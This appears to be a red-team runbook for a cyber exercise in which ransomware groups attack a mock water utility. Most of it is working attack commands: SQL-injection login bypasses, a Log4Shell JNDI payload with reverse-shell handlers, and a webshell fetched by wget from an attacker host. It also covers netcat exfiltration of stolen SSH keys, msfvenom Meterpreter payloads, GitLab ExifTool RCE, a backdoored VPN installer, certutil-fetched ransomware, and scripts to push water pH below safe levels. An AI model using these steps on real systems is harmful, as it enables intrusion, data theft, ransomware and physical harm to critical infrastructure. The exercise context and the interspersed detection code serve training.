# CIDeX 22 MESL
* TTP Google Sheets link
https://docs.google.com/spreadsheets/d/199mK8J7aUwSANgao2tDoB4UAN9exMi1or9_toE1LREA/edit#gid=523738876
# Day 0 - FIREANT gaining C2 on CW from IT to OT
In this phase, the FIREANT ransomware group conducts reconnaissance against CW, then exploits Log4J on the Staff Portal to push deeper into the CW network.
### Reconnaissance
### <mark style="background-color: lightblue">Conducting Reconnaissance against Web Server <font size="1">(http://01.clearwater.com 100.100.1.12)</font></mark>
#### **1. Surf the following sub-pages on the CW web page**
```
http://01.clearwater.com/
http://01.clearwater.com/function.php [Tabs on the main page]
http://01.clearwater.com/filter.php [Tabs on the main page]
http://01.clearwater.com/login.php [Tabs on the main page]
```
#### **2. Run various enumeration tools against the CW web page**
* Nikto (Scan for vulnerabilities)
```nikto -h http://01.clearwater.com```
* Nmap (Scan for other open ports)
```nmap -sC -sV 01.clearwater.com```
* SQLi attempts on /login.php (username | password)
* Failed attempts (to generate logs)
```admin | admin```
```OR 1 = 1 | OR 1 = 1```
```OR = 1 -- | OR = 1 --```
```OR '1' = '1' | OR '1' = '1'```
* Successful attempt (the leading quote closes the string literal and `--` comments out the rest of the query)
```' OR 1=1 -- | ' OR 1=1 --```
* Wfuzz (Web content scanner)
```wfuzz --hc 404 -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 01.clearwater.com/FUZZ```
```wfuzz --hc 404 -c -w wordlist_url.txt FUZZ01.clearwater.com```
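Why only the last payload works: the attempts without a leading quote stay inside the string literal, while `' OR 1=1 --` breaks out of it. The following is an added example, not code from the exercise, that reproduces this against a login query built by string concatenation (an assumption about how the CW login page is written; the users table and its row are constructed demo data) and shows that a parameterised query is unaffected by every payload on the list.

```python
"""Added example, not part of the exercise runbook: why the listed login
attempts succeed or fail against a login query built by string
concatenation, and why a parameterised query ignores all of them.

Assumption (not stated on the page): the CW login page builds a query of
the form  SELECT ... WHERE username='<u>' AND password='<p>'.
The users table and its single row are constructed demo data.
"""
import sqlite3

# Payloads exactly as typed on the page, as (username, password) pairs.
FAILED_ATTEMPTS = [
    ("admin", "admin"),
    ("OR 1 = 1", "OR 1 = 1"),
    ("OR = 1 --", "OR = 1 --"),
    ("OR '1' = '1'", "OR '1' = '1'"),
]
SUCCESSFUL_ATTEMPT = ("' OR 1=1 -- ", "' OR 1=1 -- ")


def make_db():
    """In-memory database with one constructed account."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('webadmin', 'S3cret!')")
    return db


DB = make_db()


def login_vulnerable(username, password, db=DB):
    """Concatenated query: user input is parsed as SQL.
    Returns True when at least one row matches (login 'succeeds')."""
    query = ("SELECT COUNT(*) FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    try:
        (count,) = db.execute(query).fetchone()
    except sqlite3.OperationalError:
        # Unbalanced quotes give a syntax error: the request fails and lands
        # in the error log, which is the noise the failed attempts are for.
        return False
    return count > 0


def login_safe(username, password, db=DB):
    """Parameterised query: input is bound as data, never parsed as SQL."""
    (count,) = db.execute(
        "SELECT COUNT(*) FROM users WHERE username=? AND password=?",
        (username, password)).fetchone()
    return count > 0


def attack_summary():
    """Map each page payload (username part) to whether it bypasses the
    vulnerable login."""
    return {u: login_vulnerable(u, p)
            for u, p in FAILED_ATTEMPTS + [SUCCESSFUL_ATTEMPT]}
```

The unquoted `OR 1 = 1` variants are harmless because they never leave the string literal; `OR '1' = '1'` without a leading quote just produces a syntax error. Only the quoted payload turns the WHERE clause into `username='' OR 1=1`, which every row satisfies.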
### <mark style="background-color: lightblue">Conducting Reconnaissance against Staff Portal <font size =1>(http://staff.01.clearwater.com 100.100.1.21)</font></mark>
#### **1. Run various enumeration tools against the Staff Portal**
* Nmap scan revealed that the Staff Portal is hosted on port 8080 (Apache Tomcat/Coyote JSP engine 1.1)
```nmap -sC -sV staff.01.clearwater.com```
* Nikto (Scan for vulnerabilities)
```nikto -h staff.01.clearwater.com -port 8080 ```
* Wfuzz (Web content scanner)
```wfuzz --hc 404 -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt staff.01.clearwater.com:8080/FUZZ```
#### 2. Surf the following sub-pages on the Staff Portal
```
http://staff.01.clearwater.com:8080/
http://staff.01.clearwater.com:8080/business [Tabs on the main page]
http://staff.01.clearwater.com:8080/login [Tabs on the main page]
```
#### **3. SQLi attempt (username | password)**
* Failed attempt
```' OR 1=1 -- | ' OR 1=1 -- ```
## Initial Access
In this phase, the attacker gains initial access to the CW network by exploiting the Log4J JNDI lookup vulnerability (Log4Shell, CVE-2021-44228) on the Staff Portal.
### <mark style="background-color:lightblue">Initial Access to Staff Portal <font size = 1>(http://staff.01.clearwater.com:8080 100.100.1.21:8080)</font></mark>
#### **1. Running the Log4J attack against both the Web Server and the Staff Portal**
* Launch the Log4J PoC (malicious LDAP server plus class server) and set up a handler on the Kali VM
- Terminal 1 (PoC: LDAP on 1389, class server on --webport, reverse shell back to --lport):
```sudo su```
```cd /home/kali/kayler```
```python3 log4j-shell-poc-main/poc.py --userip www.tnaerif123.com --webport 8080 --lport 8082```
- Terminal 2 (handler; lport must match --lport above, and the PoC spawns a plain shell, not Meterpreter):
```sudo msfconsole```
```use exploit/multi/handler```
```set payload generic/shell_reverse_tcp```
```set lhost <<KALI IP>>```
```set lport 8082```
```run```
* Entering the JNDI lookup string into the login pages
- Head over to both login pages
```http://01.clearwater.com/login.php```
```http://staff.01.clearwater.com:8080/login```
- Paste the generated payload into the 'Username' field and click 'Submit'
```${jndi:ldap://www.tnaerif123.com:1389/a}```
*#The attack did not work against the Web Server*
*#A basic (non-Meterpreter) shell is spawned from the Staff Portal*
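From the blue side, the lookup string above is the thing to hunt for in the portal's request logs, including the nested-lookup obfuscations attackers use to dodge a naive `${jndi:` match. The following is an added example, not part of the runbook, that normalises nested lookups the way Log4j's own substitution does and runs the check over constructed log lines (it assumes the login field is being logged; Tomcat's default access log does not record POST bodies).

```python
"""Added example, not from the runbook: a blue-team check for the JNDI lookup
string used above, run over constructed request-log lines (assume the login
field is logged; Tomcat's default access log does not record POST bodies).
It also catches the common obfuscations (${lower:j}, ${upper:n}, ${::-j},
${env:NOPE:-j}) by collapsing nested lookups innermost-first, the way Log4j's
own substitution does. www.tnaerif123.com is the attacker host from the page;
timestamps and client IPs are made up.
"""
import re

# An innermost lookup: '${' ... '}' with no further braces inside.
_INNER = re.compile(r"\$\{([^{}]*)\}")
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def _resolve(body):
    """Evaluate one brace-free lookup body. Default values (${x:-v}) and
    lower/upper are the obfuscation primitives; anything else is kept."""
    if ":-" in body:
        return body.rsplit(":-", 1)[1]
    if body.startswith("lower:"):
        return body[len("lower:"):].lower()
    if body.startswith("upper:"):
        return body[len("upper:"):].upper()
    return "${" + body + "}"


def normalise(text, max_rounds=20):
    """Collapse nested lookups until nothing changes, e.g.
    ${${lower:j}ndi:ldap://x/a}  ->  ${jndi:ldap://x/a}."""
    for _ in range(max_rounds):
        new = _INNER.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line):
    """True if the line carries a JNDI lookup after de-obfuscation."""
    return _JNDI.search(normalise(line)) is not None


# Constructed sample lines (not real exercise logs).
SAMPLE_LINES = [
    '100.101.1.160 - - [12/Nov/2022:10:01:02 +0800] "POST /login HTTP/1.1" 302 '
    '"username=${jndi:ldap://www.tnaerif123.com:1389/a}"',
    '100.101.1.160 - - [12/Nov/2022:10:01:07 +0800] "POST /login HTTP/1.1" 302 '
    '"username=${${lower:j}${upper:n}di:${::-l}dap://www.tnaerif123.com:1389/a}"',
    '100.100.1.50 - - [12/Nov/2022:10:02:11 +0800] "POST /login HTTP/1.1" 200 '
    '"username=evelyn.frank"',
    '100.100.1.51 - - [12/Nov/2022:10:03:40 +0800] "GET /business HTTP/1.1" 200 "-"',
]


def flagged(lines=SAMPLE_LINES):
    """Return the lines that carry a (possibly obfuscated) JNDI lookup."""
    return [ln for ln in lines if is_log4shell_probe(ln)]
```

The case-insensitive match after normalisation matters: `${upper:n}` turns `jndi` into `jNdi`, which Log4j still resolves. The second signal a defender has is the one noted on the page: the outbound LDAP connection from the Staff Portal to port 1389 on an external host, followed by an HTTP fetch of the class file.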
## Enumeration
### <mark style="background-color: lightblue">Enumerating Staff Server <font size=1>(http://staff.01.clearwater.com:8080)</font></mark>
#### **1. Host Enumeration**
* Enumerate the host; a docker0 network interface is present (the Staff Portal is a dockerised Tomcat instance)
```ip add```
```ls -la /```
* List all folders in the current directory
```ls -la```
* Locate the Tomcat webapps folder that hosts the portal files (Tomcat lives under /usr/local/tomcat)
```
cd /usr/local/tomcat
ls
cd webapps
ls
cd ROOT
ls
cd WEB-INF
ls
cd views
ls
cat BusinessView.jsp
```
#### **2. Data exfiltration using a Tomcat JSP webshell**
- Download the JspSpy JSP webshell <font size="1">https://github.com/tutorial0/WebShell/blob/master/Jsp/Jspspy%20web~shell%20V1.0%20%E2%80%BBMADE%20by%20%E5%AD%A4%E6%B0%B4%E7%BB%95%E5%9F%8E%20QQ540410588.jsp</font> and serve it from a web server on Kali
```
python3 -m http.server 8000
```
- Replace the view behind http://staff.01.clearwater.com:8080/business with the webshell, using the shell obtained via Log4J
```
cd /usr/local/tomcat/webapps/ROOT/WEB-INF/views
wget www.tnaerif123.com:8000/webshell.jsp -O BusinessView.jsp
```
- Using the uploaded webshell
```Browse to http://staff.01.clearwater.com:8080/business```
```Log in as "admin"``` (use http://100.100.1.21:8080/business instead if the hostname causes issues)
```Search for "/"``` (root directory)
```Download (下载) the following files from the .ssh folder```
```
- id_rsa
- id_rsa.pub
- known_hosts
```
#### **3. Cracking Credentials Offline on the Kali VM**
- Extracting creds
*#Identify the username from the key comment: "user@ubuntu"*
```cat id_rsa.pub```
*#Fix the private key permissions so ssh will accept it*
```chmod 600 id_rsa```
*#Crack the hashed known_hosts entry to recover the IP of the remote machine*
* Convert known_hosts into a format hashcat can use (the entry is HMAC-SHA1 keyed with the salt, hashcat mode 160) and crack it with an IPv4 mask <font size="1">https://github.com/chris408/known_hosts-hashcat.git</font>
```python3 kh-converter.py known_hosts > converted_known_hosts```
```hashcat -m 160 --quiet --hex-salt converted_known_hosts -a 3 ipv4_hcmask.txt``` // The cracked hash returns '10.1.12.13'
```#Remember to clear the potfile (~/.local/share/hashcat/hashcat.potfile) between runs, otherwise hashcat will not re-display an already cracked entry```
* The `ip a` output on the Staff Portal shows its public IP mapped to its private IP (100.100.1.21 => 10.1.12.21). The attacker therefore maps 10.1.12.13 to 100.100.1.13, which turns out to be the App Server, reachable via SSH.
*#Ping the IP above to determine whether it is reachable*
```ping -c 3 100.100.1.13```
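What kh-converter.py and `hashcat -m 160` are doing: an OpenSSH hashed known_hosts entry is `|1|base64(salt)|base64(HMAC-SHA1(key=salt, msg=hostname))`, so with the salt in the clear the only unknown is the hostname, and an IPv4 address is a small keyspace. The following is an added example, not part of the runbook, that does the same brute force in pure Python over a CIDR range; the known_hosts line is constructed here with a fixed salt so it is reproducible, and the key blob is a placeholder.

```python
"""Added example, not from the runbook: what kh-converter.py plus
hashcat -m 160 do, in pure Python. An OpenSSH hashed known_hosts host field is
    |1|base64(salt)|base64(HMAC-SHA1(key=salt, msg=hostname))
with a 20-byte random salt, so the only unknown is the hostname, and an IPv4
address is a small enough keyspace to brute-force (hashcat's ipv4 mask does
the same over all of IPv4; here a CIDR range is the argument).

The known_hosts line below is constructed with a fixed salt so the demo is
reproducible; it hashes the address the page recovers, 10.1.12.13, and the
key blob is a placeholder, not a real host key.
"""
import base64
import hashlib
import hmac
import ipaddress


def hash_host(hostname, salt):
    """Build the OpenSSH hashed form of a known_hosts host field."""
    mac = hmac.new(salt, hostname.encode(), hashlib.sha1).digest()
    return "|1|%s|%s" % (base64.b64encode(salt).decode(),
                         base64.b64encode(mac).decode())


def parse_entry(line):
    """Return (salt, mac) from a '|1|<salt>|<mac> <keytype> <key>' line."""
    host_field = line.split()[0]
    marker, version, salt_b64, mac_b64 = host_field.split("|")
    if marker != "" or version != "1":
        raise ValueError("not a hashed known_hosts entry")
    return base64.b64decode(salt_b64), base64.b64decode(mac_b64)


def crack_ipv4(line, cidr):
    """Try every host address in cidr against the entry; return the match
    or None. This is the mask attack from the page, restricted to a range."""
    salt, mac = parse_entry(line)
    for addr in ipaddress.ip_network(cidr).hosts():
        candidate = str(addr)
        digest = hmac.new(salt, candidate.encode(), hashlib.sha1).digest()
        if hmac.compare_digest(digest, mac):
            return candidate
    return None


SALT = bytes(range(20))   # fixed for reproducibility; OpenSSH uses a random salt
KNOWN_HOSTS_LINE = (hash_host("10.1.12.13", SALT)
                    + " ssh-ed25519 PLACEHOLDER_KEY_BLOB")

if __name__ == "__main__":
    print(crack_ipv4(KNOWN_HOSTS_LINE, "10.1.0.0/16"))
```

Two practical caveats: a host that was reached on a non-default port is hashed as `[host]:port`, not as the bare address, so the candidate string must include the brackets and port; and a hostname rather than an IP will not fall to an IPv4 mask at all, which is why the page's next step (mapping the private 10.1.12.x address onto the public 100.100.1.x range) is needed before the key can be used.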
#### 4. Establishing a connection to the App Server via the stolen id_rsa key (100.100.1.13)
- SSH into the App Server using id_rsa from the Kali VM
```ssh -i id_rsa user@100.100.1.13```
- Further enumerating the App Server
```ip add```
```pwd```
```ls -la```
```cd /```
*#cd to root directory*
```find . | grep "pass"```
```find . | grep "user"```
```find . | grep "creds"```
```ls -la /home/user/Desktop```
```cd ~/Desktop```
```zip archive test.doc doge.xls```
- Firefox bookmark backups found in the .mozilla folder
*#Navigate to the bookmark backup folder and archive it for exfiltration*
```ls /home/user/.mozilla```
```cd /home/user/.mozilla/firefox/```
```ls```
```cd e8tkjus5.default-release/bookmarkbackups```
```ls```
```zip archive2 bookmarks-*```
- Use netcat to exfiltrate the zip files (100.101.1.16X is the Kali VM)
*#Kali*
```nc -nvlp 8083 > archive2.zip ```
*#App Server*
```nc 100.101.1.16X 8083 < archive2.zip```
*#Kali*
```nc -nvlp 8083 > archive.zip ```
*#App Server*
```cd ~/Desktop```
```nc 100.101.1.16X 8083 < archive.zip```
- Simulate reviewing the data inside the zipped files and wait 5~10 minutes
- *#Attempt to ping the next target* <font style=color:red>need to see if it is domain name or still IP</font>
```ping -c 3 10.1.10.4```
```uname -a```
*#Ping was successful: the App Server has access to the 10.1.10.x subnet.*
- Establish a Meterpreter session on the App Server (the plain SSH shell cannot be used for Metasploit routing) <font style=color:red>For routing purposes, will change if there's alternative</font>
*#Background (ctrl-z) all sessions and create a listener*
```background```
```use multi/handler```
```set payload linux/x64/meterpreter/reverse_tcp```
```set lhost <KALI IP>```
```set lport 7171```
```exploit```
*#Generate a Meterpreter reverse shell (LPORT must match the handler above)*
```msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<KALI IP / DOMAIN> LPORT=7171 -f elf -o reverse.elf```
```python3 -m http.server 8000```
*#Run the following in the victim's SSH session*
```wget <KALI IP / DOMAIN>:8000/reverse.elf```
```chmod +x reverse.elf```
```./reverse.elf```
## Lateral Movement
### <mark style="background-color :lightblue">Lateral Movement from Apps Server to File Server</mark>
- Scan the File Server
*#Add a route to the 10.1.10.0/24 subnet through the App Server Meterpreter session*
```bg```
```use autoroute```
```use 0```
```set cmd add```
```set subnet 10.1.10.0```
```set netmask 255.255.255.0```
```set session <App Server Meterpreter session>```
```run```
- Use the Metasploit TCP port scanner (it follows the route; nmap from Kali would not) to scan the File Server for open ports
```use auxiliary/scanner/portscan/tcp```
```set rhosts 10.1.10.4```
```run```
*#Port 80 is open*
- Accessing web portal of File Server
*#Portforward local port 80 to File Server port 80 using App Server as the port forwarder to view the file server portal*
```sessions -i X (App Server's session)```
```portfwd add -l 80 -p 80 -r 10.1.10.4```
*#Visit the File Server web portal*
```http://127.0.0.1/ (using firefox)```
*#Found the File Server to be running GitLab 13.9.0*
- Identifying the vulnerabilities
*#After registering an account, visit the /help page to confirm the GitLab version* <font size="1">(https://vulners.com/zdt/1337DAY-ID-36997)</font>
```GitLab Community Edition 13.9.0, vulnerable to the ExifTool remote command injection (CVE-2021-22205) via uploaded image metadata```
*#Executing the exploit*
```bg```
```use exploit/multi/http/gitlab_exif_rce```
```set payload linux/x64/meterpreter/reverse_tcp```
```set rhosts 10.1.10.4```
```set srvport 8081```
```set lhost <KALI IP>```
```set lport 8084```
```run```
<font style=color:red>^^ From the blue-team POV, the File Server should be seen making an outbound web request (wget) to the attacker's srvport for a randomly named file</font>
### <mark style="background-color: lightblue">Enumerating the Gitlab</mark>
- Use the newly created account above to look through the projects within the gitlab under the "Explore Project" tabs
- Created a new GitLab user named "Evelyn Frank10" to impersonate one of the employees
- Create a new project as "Evelyn Frank10"
### <mark style="background-color: lightblue">Malicious project on Gitlab</mark>
- Create a new project named "VPN Testing2" as user "Evelyn Frank10", and backdoor a FortiClient VPN installer for users to download.
*# Download https://links.fortinet.com/forticlient/win/fabricagent*
*#Generate the Windows payload (LHOST is the File Server's own address, where the handler is bound through the GitLab session, see below)*
```msfvenom -a x86 --platform windows -x FortiClientOnlineInstaller.exe -k -p windows/meterpreter/reverse_tcp LHOST=10.1.10.4 LPORT=9005 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o FortiClientVPNInstaller.exe```
*#Head over to the newly created project and upload the file*
## Lateral Movement to Other Machines
- Set up a listener on the File Server
*Currently, the route to 10.1.10.X (the File Server subnet) goes through the App Server session. To bind a listener on the File Server itself, the existing route pointing at the App Server must be deleted and a new route to 10.1.10.X added through the GitLab shell session*
*#Kill the existing route*
```bg```
```route del 10.1.10.0/24 <App Server Shell Session ID>```
*#Add new route*
```use autoroute```
```use 0```
```set session <gitlab shell session ID>```
```run```
```route```
*#Ensure that 10.1.10.4 points to gitlab shell session ID*
- Set up a listener on File Server
```use multi/handler```
```set payload windows/meterpreter/reverse_tcp```
```set lhost 10.1.10.4```
```set ExitOnSession false```
```set lport 9005```
```run -j```
*#Ensure that the listener is running on 10.1.10.4*
<font style=color:red>IF CANT GET CONNECTION BACK, NEED TO REATTACH NETWORK INTERFACE</font>
- Wait for the Maintenance system admin and a Domain user to download and run the payload
*#Maintenance Access*
```log into the maintenance machine```
```access to the gitlab project```
```download and run```
*#Domain user Access*
```log into any domain user```
```access to the gitlab project```
```download and run```
# Day 0 & Day 1 1000H - MANTIS Reconnaissance against GPGP
* CY add some recon stuff here
# Day 1 1000H - FIREANT Ransomware Attacks
### Ransomware Attack
- PsExec into the following hosts and repeat the commands:
#### IT and OT Impact Prep - Ransomware
- Host the files from Kali
```cd WinUpdate```
```python3 -m http.server 9009```
- Download to the Domain user and Maintenance machines
```cd %temp%```
```certutil -urlcache -f http://100.101.1.16X:9009/update.jpg %cd%\update.jpg```
```certutil -urlcache -f http://100.101.1.16X:9009/update.bat %cd%\update.bat```
```certutil -urlcache -f http://100.101.1.16X:9009/LB3.exe %cd%\LB3.exe```
*#Spread the files using PsExec*

OR

- Drop ransomware.ps1 in /home/kali/kayler and serve it
```
cd /home/kali/kayler
python3 -m http.server 9009
```
- Open the session connected to the victim, fetch and launch the ps1 script, then reboot
```
certutil -urlcache -f http://100.101.1.16X:9009/ransomware.ps1 %cd%\ransomware.ps1
powershell.exe -executionpolicy bypass -windowstyle hidden -noninteractive -nologo -file ransomware.ps1
```
- Prompt White Cell to showcase the Screenshot from Ransomware attack
# Day 1 1300H - MANTIS launching CW OT Attack
### Re-enter the network using FIREANT's backdoor
* WIP: either SSH in, or re-enter via the SQLi on the web server
### OT Impact Prep - Water distribution
* Access OT via the Maintenance machine
*#Find the session to the Maintenance machine*
```sessions```
```sessions -i <ID of Maintenance machine>```
*#Enumeration revealed access to OT*
```dir```
```whoami```
```cd```
*#Found OT-related documents on the Desktop*
```cd Desktop```
```dir```
```cat "start_history_extract.bat - Shortcut.lnk"```
```cd "Hist-Extract old"```
*#Found credentials in one of the files*
```cat troubleshoot.txt``` (access to mavis:P@ssw0rd at 192.168.1.248)
*#Download the contents using Meterpreter's `download` command*
* Testing and adding a route to the Engineering Workstation
*#From a shell on the (Windows) Maintenance host*
```ping -n 3 192.168.1.248```
*#Add a route to the 192.168.1.X subnet through the Maintenance session*
```bg```
```use post/multi/manage/autoroute```
```set cmd add```
```set subnet 192.168.1.0```
```set netmask 255.255.255.0```
```set session <Maintenance shell session ID>```
```run```
*#Start a SOCKS proxy so proxychains can reach 192.168.1.x through the route*
```use auxiliary/server/socks_proxy```
```set SRVPORT 9050```
```set VERSION 4a```
```run```
*#ssh to Mavis (proxychains.conf must point at socks4 127.0.0.1 9050, which is its default)*
```proxychains ssh mavis@192.168.1.248```
```P@ssw0rd```
### OT Discovery and Pivoting
* Retrieve the tags for Water Distribution
```proxychains python3 gettag.py``` (needs testing tomorrow)
WADI
- Launch port scanner to discover Modbus and ENIP
```
Set-ExecutionPolicy Bypass
Import-Module .\port-scan-tcp.ps1
0..255 | foreach { port-scan-tcp 192.168.1.$_ 502, 44818 }
```
or
```
Portscan using Metasploit through the autoroute (msfconsole)
use auxiliary/scanner/portscan/tcp
set ports 502,44818
set rhosts 192.168.1.0/24
run
```
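Both scanners above only tell you that a port accepts connections. The following is an added example, not part of the runbook, that does the same Modbus/ENIP connect scan with the standard library (so it runs unchanged under proxychains, or on a pivot host that has Python but no nmap) and then confirms a 502 hit really speaks Modbus by sending one single-register FC3 read and validating the MBAP header of the reply. The 192.168.1.0/24 default is the page's range; the fake responder at the bottom is a constructed stand-in for a PLC so the demo runs offline.

```python
"""Added example, not part of the runbook: a stdlib-only TCP scan for the two
ICS ports the page hunts for, Modbus/TCP (502) and EtherNet/IP (44818), plus
a follow-up check that a host answering on 502 really speaks Modbus (an open
port alone may be a proxy, firewall or honeypot). Plain connect() calls, so
it runs unchanged under proxychains.

Assumptions: the page's 192.168.1.0/24 range is only the default argument;
fake_modbus_responder() is a constructed stand-in for a PLC so the demo runs
offline, it is not part of the exercise environment.
"""
import ipaddress
import socket
import struct
import threading
from concurrent.futures import ThreadPoolExecutor

ICS_PORTS = {502: "modbus", 44818: "enip"}


def modbus_read_request(tid, unit=1, addr=0, qty=1):
    """MBAP header (transaction id, protocol 0, length, unit) + FC3 PDU."""
    pdu = struct.pack(">BHH", 3, addr, qty)
    return struct.pack(">HHHB", tid, 0, len(pdu) + 1, unit) + pdu


def tcp_open(host, port, timeout=0.5):
    """Connect scan of a single port."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def speaks_modbus(host, port=502, timeout=1.0):
    """Send one harmless FC3 read of a single register and validate the
    reply: same transaction id, protocol id 0, FC3 or its exception 0x83."""
    tid = 0x1234
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(modbus_read_request(tid))
            reply = s.recv(8)
    except OSError:
        return False
    if len(reply) < 8:
        return False
    r_tid, proto, _length, _unit, fc = struct.unpack(">HHHBB", reply)
    return r_tid == tid and proto == 0 and fc in (3, 0x83)


def scan(hosts, ports=ICS_PORTS, timeout=0.5, workers=64):
    """Return {host: {port: service_name}} for every open ICS port."""
    targets = [(h, p) for h in hosts for p in ports]
    found = {}
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda t: tcp_open(t[0], t[1], timeout), targets)
        for (h, p), is_open in zip(targets, results):
            if is_open:
                found.setdefault(h, {})[p] = ports[p]
    return found


def scan_cidr(cidr="192.168.1.0/24", ports=ICS_PORTS, timeout=0.5):
    """Scan every host address in the CIDR (the page's 0..255 loop)."""
    return scan([str(a) for a in ipaddress.ip_network(cidr).hosts()], ports, timeout)


def fake_modbus_responder():
    """Constructed stand-in for a PLC on loopback: answers any FC3 read with
    one register (value 42). Returns the port it listens on."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def serve():
        while True:
            conn, _ = srv.accept()
            with conn:
                req = conn.recv(12)
                if len(req) >= 2:          # the bare connect scan sends nothing
                    tid = struct.unpack(">H", req[:2])[0]
                    # length 5 = unit + fc + byte count + 2 data bytes
                    conn.sendall(struct.pack(">HHHBBB", tid, 0, 5, 1, 3, 2) + b"\x00\x2a")

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]


def demo():
    """Scan loopback with the fake PLC's port standing in for 502; returns
    (service names found on 127.0.0.1, whether it really speaks Modbus)."""
    port = fake_modbus_responder()
    found = scan(["127.0.0.1"], {port: "modbus", 44818: "enip"})
    return sorted(found.get("127.0.0.1", {}).values()), speaks_modbus("127.0.0.1", port)


if __name__ == "__main__":
    print(demo())
```

Keep the timeout short and the worker count modest on a real OT segment: PLC TCP stacks are small, and a flood of half-open connections can wedge the very device you are trying to enumerate. The FC3 read of one register is the least intrusive Modbus request; do not send writes (FC5/FC6/FC16) as a discovery probe.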
- Launch PLC tags discovery
```
cd OT_Attacks
proxychains python3 taglist_swat.py
proxychains python3 taglist_wadi.py
```
or
```
proxychains scp taglist_swat.py mavis@192.168.1.248:C:/Users/mavis/taglist_swat.py
proxychains scp taglist_wadi.py mavis@192.168.1.248:C:/Users/mavis/taglist_wadi.py
python3 taglist_swat.py
python3 taglist_wadi.py
```
<font style=color:red>might need use scp to drop into mavis to run</font>
### OT Process Data Exfiltration
- Launch Historian dump
- Drop the tag extraction tool onto the HMI (Client.exe is first pulled from the 100.101.1.140 host)
```proxychains scp user@100.101.1.140:C:/USERS/USER/Desktop/bup_script/dist/Client.exe .```
```
proxychains python extract_tags_main.py
```
<font style=color:red>might need use scp to drop into mavis to run</font>
### OT Attacks
*#Create the Distribute Water and UV Poison OT attacks*
```Modify the scripts exfiltrated via the Maintenance shell```
- Force WADI to continue distributing water
```
proxychains python3 "Distribute water.py"
```
- Try to push SWaT's pH below 7
```
proxychains python3 "UV poison.py"
```
OR
- Force WADI to continue distributing water
```
proxychains scp start_water.py mavis@192.168.1.248:C:/Users/mavis/start_water.py
python3 start_water.py
```
- Try to push SWaT's pH below 7
```
proxychains scp "UV poison.py" "mavis@192.168.1.248:C:/Users/mavis/UV poison.py"
python3 "UV poison.py"
```
# Day 1 1500H - MANTIS launching GPGP OT Attack
## Initial Access & Execution
- <span style="color:green"><GT Action></span> Administrator (10.1.20.51) executed malicious Grass Marlin
- <span style="color:green"><GT Action></span> Connect USB onto the host, and extract GrassMarlin-Win-64.
- <span style="color:green"><GT Action></span> Right click and launch as administrator
- Malware injects the keylogger named "GrassMarlin.dll" into svchost.exe
- <span style="color:green"><GT Action></span> Administrator send email to management and update the progress of the installation
## Collection & Lateral Movement
- Collection
- The keylogger identifies the username by watching for input of the domain username concatenated with "01.gpgp.com"
- Once <username>@01.gpgp.com has been typed, the injected malware records keystrokes until the user hits Enter or more than 16 characters have been entered
- The captured password is stored in `C:\Windows\Temp\marlin.config`
- Lateral Movement to the DC
- The malware uses wmic to copy the stage 2 payload onto the PDC and run it
- The stage 2 payload drops the stage 3 payload and disseminates it to the IT, Management and HR OUs
- Lateral Movement to the Billing Portal
- SSH in and inject a webshell into the first line of index.jsp
## C2 via HTTP using CADERA
- Drop OT malware on Marvis and launch it
# Day 2 0600H - Automated Wiper Malware Detonation
### Detonating the Wiper
- The wiper malware is distributed to the Accounting, Engineering and Management OUs via the DC, using the update.ps1 running on the DC
- Affected host:
- Agapios.Ling (10.1.20.21)
- Akhila.Kaur (10.1.20.22)
- Bethel.Hayden (10.1.20.27)
- Chetan.Chaudhri (10.1.20.28)
- Chun.Hu (10.1.20.29)
- Connie.Peters (10.1.20.30)
- Destiny.Lucas (10.1.20.31)
- Elias.Nussbaum (10.1.20.32)
- Eustachys.Den (10.1.20.33)
### Todo (environment prep)
--staff--
- update /etc/resolv.conf to point www.tnaerif123.com to Kali
- clean up .21
- add ssh and network resolv to docker
```
sudo docker run -v /etc/server.xml:/usr/local/tomcat/conf/server.xml -v /tmp/log:/usr/local/tomcat/logs -v /home/user/.ssh:/.ssh --log-driver syslog --log-opt syslog-address=udp://10.1.13.3:5044 -d --network host greatpower
```
--www dns--
- update golden image because hosts file updated
--appsvr--
- need to clean files
- update golden image because resolv updated
--gitlabsvr--
- update golden image because resolv updated
```
msfvenom -a x86 --platform windows -x FortiClientOnlineInstaller.exe -k -p windows/meterpreter/reverse_tcp LHOST=10.1.10.4 LPORT=9005 -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o FortiClientInstaller.exe
```